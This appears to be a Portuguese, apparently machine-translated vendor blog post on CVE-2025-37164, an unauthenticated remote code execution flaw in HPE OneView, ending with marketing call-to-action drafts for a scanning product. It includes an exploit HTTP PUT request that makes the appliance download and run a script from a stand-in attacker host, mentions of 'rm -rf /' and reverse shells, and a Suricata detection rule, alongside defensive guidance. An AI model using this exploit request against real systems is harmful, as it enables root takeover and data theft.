Na crescente era de 2026, em que "a computação é o novo petróleo", a segurança do data center físico nunca foi tão importante. Enquanto as equipes vermelhas passam semanas elaborando injeções rápidas para contornar as proteções do LLM, uma ameaça muito mais primitiva e devastadora surgiu do subsolo da pilha de TI.
Em 16 de dezembro de 2025, o mundo da segurança foi abalado pela divulgação de CVE-2025-37164, uma vulnerabilidade em HPE OneView carregando o raro e assustador Pontuação CVSS de 10,0.
Para os não iniciados, o HPE OneView é o software "God Mode" para a moderna infraestrutura definida por software (SDI). Ele automatiza o provisionamento de milhares de servidores HPE Synergy e ProLiant - as mesmas feras bare-metal que alimentam os clusters de treinamento de IA mais avançados do mundo.
CVE-2025-37164 é um Execução remota de código (RCE) não autenticada vulnerabilidade. Ela permite que qualquer invasor com acesso de rede à porta de gerenciamento execute comandos arbitrários do sistema como root, entregando efetivamente as chaves de toda a frota física. Este artigo abandona o resumo de alto nível para realizar uma dissecação cirúrgica da falha da API e suas implicações para a engenharia de segurança de IA.

A arquitetura de uma vulnerabilidade do "Modo Deus"
Para compreender a gravidade dessa falha, é preciso entender a função do OneView. Ele fica acima das interfaces BMC (Baseboard Management Controller) e iLO (Integrated Lights-Out), agregando controle sobre computação, armazenamento e malhas de rede.
A vulnerabilidade reside em um endpoint específico da API REST: /rest/id-pools/executeCommand.
1. A catástrofe da configuração
No design seguro da API, os pontos de extremidade capazes de executar comandos do sistema devem ser protegidos por várias camadas: Autenticação (OAuth/Session), Autorização (RBAC) e Sanitização de entrada.
Nas versões afetadas do OneView (anteriores à 11.0), a definição de ponto de extremidade para executeCommand sofreu um erro de configuração catastrófico. O mapa do filtro de segurança interno marcou essa rota com auth-type: NO_AUTH.
Lógica hipotética de back-end (pseudocódigo Java/Spring):
Java
`@RestController @RequestMapping("/rest/id-pools") public class IdPoolController {
// FALHA FATAL: falta de @PreAuthorize("isAuthenticated()")
// Esse endpoint provavelmente foi planejado para comunicação interna entre serviços
// mas foi exposto à interface pública.
@PutMapping("/executeCommand")
public ResponseEntity execute(@RequestBody CommandRequest payload) {
String binary = payload.getCommand();
String[] args = payload.getArgs();
// FATAL FLAW: injeção direta no ProcessBuilder sem sanitização
ProcessBuilder pb = new ProcessBuilder(binary);
pb.command().addAll(Arrays.asList(args));
Processo process = pb.start();
return ResponseEntity.ok(readOutput(process));
}
}`
Essa lógica cria um túnel direto de uma solicitação HTTP para o kernel do Linux do appliance.

2. Desconstrução da cadeia de destruição
A complexidade da exploração é Baixa. Não há corrupção de memória para massagear, não há ASLR para contornar e não há condição de corrida para vencer. É uma falha lógica pura e simples.
O primitivo de exploração:
Um invasor envia uma solicitação PUT. O payload é um objeto JSON que define o comando a ser executado.
HTTP
`PUT /rest/id-pools/executeCommand HTTP/1.1 Host: oneview-appliance.local Content-Type: application/json
{ "command" (comando): "/bin/sh", "args": ["-c", "wget http://c2.attacker.com/payload.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x"] }`
O resultado:
O appliance executa o script. O invasor recebe um shell reverso com privilégios de root. A partir daí, ele tem persistência no próprio controlador de rede.
O cenário de ameaças à infraestrutura de IA
Por que isso é específico para o "engenheiro de segurança de IA hardcore"? Porque a infraestrutura de IA é excepcionalmente vulnerável a essa classe de ataque.
1. The GPU Heist (Roubo e criptojacking)
Os clusters de treinamento de IA utilizam GPUs H100/B200, que são incrivelmente valiosas. Um invasor com acesso root ao OneView pode:
- Provisão de cargas de trabalho não autorizadas: Gire VMs ocultas no bare metal para minerar criptomoedas, consumindo megawatts de energia e capacidade de resfriamento.
- Negação de recursos: Durante um treinamento crítico (que pode custar milhões), o invasor pode emitir um
desligadopara os blades físicos por meio da interface iLO, causando perda catastrófica de dados e atrasos no projeto.
2. Envenenamento da cadeia de suprimentos via firmware
O OneView gerencia as atualizações de firmware para a frota de servidores. Um invasor com acesso root pode:
- Flash Malicious Firmware: Fazer downgrade do BIOS/UEFI para versões vulneráveis ou implantar rootkits persistentes (como BlackLotus) no flash SPI dos servidores AI.
- Acesso persistente: Mesmo que o sistema operacional seja limpo e reinstalado, o malware sobrevive no hardware, comprometendo todos os modelos futuros treinados nessa máquina.
3. Movimento lateral para data lakes
Os clusters de IA de alto desempenho são fortemente acoplados às malhas de armazenamento (Infiniband/RoCE). O OneView gerencia essas conexões. O comprometimento do OneView permite que um invasor monte os volumes NAS/SAN subjacentes, concedendo acesso direto a conjuntos de dados proprietários e pesos de modelos sem nunca tocar na rede AD corporativa.
Defesa orientada por IA: A vantagem da negligência
A detecção de vulnerabilidades de infraestrutura como a CVE-2025-37164 é um ponto cego para os scanners de aplicativos da Web (DAST) tradicionais. As ferramentas DAST rastreiam o HTML; elas raramente investigam APIs de gerenciamento obscuras em portas não padrão.
É aqui que Penligent.ai representa uma mudança de paradigma para a segurança da infraestrutura.
1. Mapeamento de ativos fora de banda (OOB)
Os agentes de IA da Penligent utilizam Mapeamento de ativos de pilha completa. Eles não se limitam a procurar aplicativos da Web; eles ouvem ativamente as assinaturas de protocolos de gerenciamento (IPMI, Redfish, HPE REST API). A IA correlaciona essas assinaturas com a mais recente inteligência contra ameaças, identificando a "infraestrutura sombra" que a TI se esqueceu de corrigir.
2. Verificação não destrutiva de RCE
A varredura de um cluster de IA de produção é arriscada. Uma varredura ruim pode travar um servidor. A Penligent usa Fuzzing com reconhecimento de contexto para realizar verificações não destrutivas.
- Carga útil segura: Em vez de enviar
rm -rf /ou um shell reverso, a Penligent envia uma carga útil benigna comoecho "Penligent_Check". - Validação: A IA analisa a resposta HTTP. Se vir a string ecoada, ela confirma o RCE com 100% de certeza, permitindo que a equipe de segurança priorize o patch sem interromper o trabalho de treinamento.
Manual do Blue Team: Detecção e proteção
Se não puder corrigir imediatamente, você está em um estado de "violação assumida".
1. Detecção de rede (Suricata/Snort)
Monitore o tráfego para a sub-rede de gerenciamento do OneView. Procure por HTTP PUT ou POST solicitações para /rest/id-pools/executeCommand.
Regra Suricata:
YAML
alert http $EXTERNAL_NET any -> $ONEVIEW_SERVER 443 (msg: "ET EXPLOIT HPE OneView CVE-2025-37164 RCE Attempt"; \\ flow:established,to_server; \\ content:"/rest/id-pools/executeCommand"; http_uri; \\ content: "command"; http_client_body; \\ content:"/bin/"; http_client_body; \\ classtype:attempted-admin; sid:1000025; rev:1;)
2. Auditoria de registros
Verifique os registros de auditoria do OneView (ci-debug.log ou audit.log) para chamadas inesperadas para o IdPools originados de endereços IP que não são o Host do Bastion designado.
3. Quarentena arquitetônica
- VLAN de gerenciamento: Certifique-se de que a interface do dispositivo OneView esteja em uma VLAN estritamente isolada, acessível apenas por meio de uma VPN com MFA.
- ACLs: Aplique Listas de Controle de Acesso no nível do switch para bloquear todo o tráfego para a porta 443 no dispositivo OneView, exceto a partir do IP específico da estação de trabalho do administrador do sistema.
Conclusão
CVE-2025-37164 serve como um lembrete brutal de que a "Nuvem" é apenas o computador de outra pessoa, e esse computador tem uma porta de gerenciamento. Na pressa de construir a AGI, não devemos negligenciar a base concreta sobre a qual ela se apóia.
A segurança do futuro da IA depende não apenas do alinhamento robusto do modelo, mas também da integridade da cadeia de suprimentos de silício. Atualize seu firmware, isole seus planos de gerenciamento e empregue uma validação inteligente e automatizada para garantir que seu console "God Mode" não se torne um playground para os invasores.
Referências confiáveis
- Boletim de segurança da HPE: HPESBGN04770 (CVE-2025-37164)
- Detalhes do NVD do NIST para o CVE-2025-37164
- Catálogo de vulnerabilidades exploradas conhecidas da CISA
- Análise Rapid7: RCE crítico não autenticado que afeta o HPE OneView
🚀 Opções de CTA
Opção 1 (Ponto de dor - Recomendado):
Seu scanner DAST é cego para as APIs de gerenciamento? A Penligent não é.
Pare de ignorar sua infraestrutura. Detecte RCEs ocultos em seu cluster de computação de IA com a Penligent hoje mesmo.
Opção 2 (Urgência):
Não deixe que um bug do "God Mode" destrua seus modelos de IA.
Valide sua postura de segurança do HPE OneView instantaneamente com os testes não destrutivos da Penligent.

